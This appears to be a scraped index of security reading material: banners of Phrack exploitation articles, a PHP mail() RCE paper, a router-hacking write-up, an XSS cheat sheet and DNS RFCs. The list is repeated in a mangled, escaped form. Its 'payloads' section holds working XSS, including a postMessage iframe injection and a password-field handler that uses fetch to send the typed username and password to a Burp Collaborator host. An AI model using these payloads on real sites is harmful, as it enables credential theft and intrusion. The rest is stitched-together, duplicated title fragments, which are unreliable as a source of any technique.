PikaChu cyberheartmi9

## Format String
                             ==Phrack Inc.==

                  0x0b, Issue 0x3b, Phile #0x07 of 0x12

|=-------------=[ Advances in format string exploitation ]=--------------=|
|=-----------------------------------------------------------------------=|
|=---------=[ by gera <gera@corest.com>, riq <riq@corest.com> ]=---------=|


    1 - Intro

## Smashing The Stack For Fun And Profit
     .oO Phrack 49 Oo.

                          Volume Seven, Issue Forty-Nine

                                  File 14 of 16

                      BugTraq, r00t, and Underground.Org
                                   bring you

                     XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

## Pwning PHP mail() function For Fun And RCE
|=-----------------------------------------------------------------------=|
|=-------------=[ Pwning PHP mail() function For Fun And RCE  ]=---------=|
|=---------------=[ New Exploitation Techniques And Vectors ]=-----------=|
|=----------------------------=[ Release 1.0 ]=--------------------------=|
|=-----------------------------------------------------------------------=|
|=-----------------------------------------------------------------------=|
|=----------------=[ by https://legalhackers.com/ ]=-------------------=|
|=-----------------------------------------------------------------------=|
|=---------------------=[ https://ExploitBox.io     ]=-------------------=|
|=---------------------=[ @Exploit_Box              ]=-------------------=|

## From Zero to ZeroDay Journey: Router Hacking (WRT54GL Linksys Case)


From Zero to ZeroDay Journey: Router Hacking (WRT54GL Linksys Case)
===================================================================
- Leon Juranic <leon[at]defensecode.com>
  http://www.defensecode.com/
  Date: 03/10/2013


## Format String Technique
                       .oO NOP Ninjas Oo.
                presents: [Format String Technique]

                       www.nopninjas.com


## ghetto XSS payloads
 _____ _          _   _          __   _______ _____   _____ _                _       _               _
|  __ \ |        | | | |         \ \ / /  ___/  ___| /  __ \ |              | |     | |             | |
| |  \/ |__   ___| |_| |_  ___    \ V /\ `--.\ `--.  | /  \/ |__   ___  __ _| |_ ___| |__   ___  ___| |_
| | __| '_ \ / _ \ __| __|/ _ \   /   \ `--. \`--. \ | |   | '_ \ / _ \/ _` | __/ __| '_ \ / _ \/ _ \ __|
| |_\ \ | | |  __/ |_| |_| (_) | / /^\ |\__/ /\__/ / | \__/\ | | |  __/ (_| | |_\__ \ | | |  __/  __/ |_
 \____/_| |_|\___|\__|\__|\___/  \/   \|____/\____/   \____/_| |_|\___|\__,_|\__|___/_| |_|\___|\___|\__|

A ghetto collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air.

Simple character manipulations.

## DNS Zone Transfer Protocol (AXFR)


Internet Engineering Task Force (IETF)                          E. Lewis
Request for Comments: 5936                                 NeuStar, Inc.
Updates: 1034, 1035                                       A. Hoenes, Ed.
Category: Standards Track                                         TR-Sys

## DOMAIN NAMES - IMPLEMENTATION AND SPECIFICATION
Network Working Group                                     P. Mockapetris
Request for Comments: 1035                                           ISI
                                                           November 1987
Obsoletes: RFCs 882, 883, 973

            DOMAIN NAMES - IMPLEMENTATION AND SPECIFICATION


1. STATUS OF THIS MEMO

## payloads
########################## xss using postmessage api ###############
<iframe src="//vulnerable-website" onload="this.contentWindow.postMessage('alert(1)','*')">
################ Exploiting cross-site scripting to capture passwords ############################################
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://lolo.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
#########################hunting phishing site ############################

## DOMAIN NAMES - CONCEPTS AND FACILITIES
Network Working Group                                     P. Mockapetris
Request for Comments: 1034                                           ISI
Obsoletes: RFCs 882, 883, 973                              November 1987


                 DOMAIN NAMES - CONCEPTS AND FACILITIES


1. STATUS OF THIS MEMO
	==Phrack Inc.==

	0x0b, Issue 0x3b, Phile #0x07 of 0x12

	\|=-------------=[ Advances in format string exploitation ]=--------------=\|
	\|=-----------------------------------------------------------------------=\|
	\|=---------=[ by gera <gera@corest.com>, riq <riq@corest.com> ]=---------=\|


	1 - Intro
	.oO Phrack 49 Oo.

	Volume Seven, Issue Forty-Nine

	File 14 of 16

	BugTraq, r00t, and Underground.Org
	bring you

	XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
	\|=-----------------------------------------------------------------------=\|
	\|=-------------=[ Pwning PHP mail() function For Fun And RCE ]=---------=\|
	\|=---------------=[ New Exploitation Techniques And Vectors ]=-----------=\|
	\|=----------------------------=[ Release 1.0 ]=--------------------------=\|
	\|=-----------------------------------------------------------------------=\|
	\|=-----------------------------------------------------------------------=\|
	\|=----------------=[ by https://legalhackers.com/ ]=-------------------=\|
	\|=-----------------------------------------------------------------------=\|
	\|=---------------------=[ https://ExploitBox.io ]=-------------------=\|
	\|=---------------------=[ @Exploit_Box ]=-------------------=\|


	From Zero to ZeroDay Journey: Router Hacking (WRT54GL Linksys Case)
	===================================================================
	- Leon Juranic <leon[at]defensecode.com>
	http://www.defensecode.com/
	Date: 03/10/2013
	.oO NOP Ninjas Oo.
	presents: [Format String Technique]

	www.nopninjas.com
	_____ _ _ _ __ _______ _____ _____ _ _ _ _
	\| __ \ \| \| \| \| \| \ \ / / ___/ ___\| / __ \ \| \| \| \| \| \| \|
	\| \| \/ \|__ ___\| \|_\| \|_ ___ \ V /\ `--.\ `--. \| / \/ \|__ ___ __ _\| \|_ ___\| \|__ ___ ___\| \|_
	\| \| __\| '_ \ / _ \ __\| __\|/ _ \ / \ `--. \`--. \ \| \| \| '_ \ / _ \/ _` \| __/ __\| '_ \ / _ \/ _ \ __\|
	\| \|_\ \ \| \| \| __/ \|_\| \|_\| (_) \| / /^\ \|\__/ /\__/ / \| \__/\ \| \| \| __/ (_\| \| \|_\__ \ \| \| \| __/ __/ \|_
	\____/_\| \|_\|\___\|\__\|\__\|\___/ \/ \\|____/\____/ \____/_\| \|_\|\___\|\__,_\|\__\|___/_\| \|_\|\___\|\___\|\__\|

	A ghetto collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air.

	Simple character manipulations.






	Internet Engineering Task Force (IETF) E. Lewis
	Request for Comments: 5936 NeuStar, Inc.
	Updates: 1034, 1035 A. Hoenes, Ed.
	Category: Standards Track TR-Sys
	Network Working Group P. Mockapetris
	Request for Comments: 1035 ISI
	November 1987
	Obsoletes: RFCs 882, 883, 973

	DOMAIN NAMES - IMPLEMENTATION AND SPECIFICATION


	1. STATUS OF THIS MEMO
	########################## xss using postmessage api ###############
	<iframe src="//vulnerable-website" onload="this.contentWindow.postMessage('alert(1)','*')">
	################ Exploiting cross-site scripting to capture passwords ############################################
	<input name=username id=username>
	<input type=password name=password onchange="if(this.value.length)fetch('https://lolo.burpcollaborator.net',{
	method:'POST',
	mode: 'no-cors',
	body:username.value+':'+this.value
	});">
	#########################hunting phishing site ############################
	Network Working Group P. Mockapetris
	Request for Comments: 1034 ISI
	Obsoletes: RFCs 882, 883, 973 November 1987


	DOMAIN NAMES - CONCEPTS AND FACILITIES



	1. STATUS OF THIS MEMO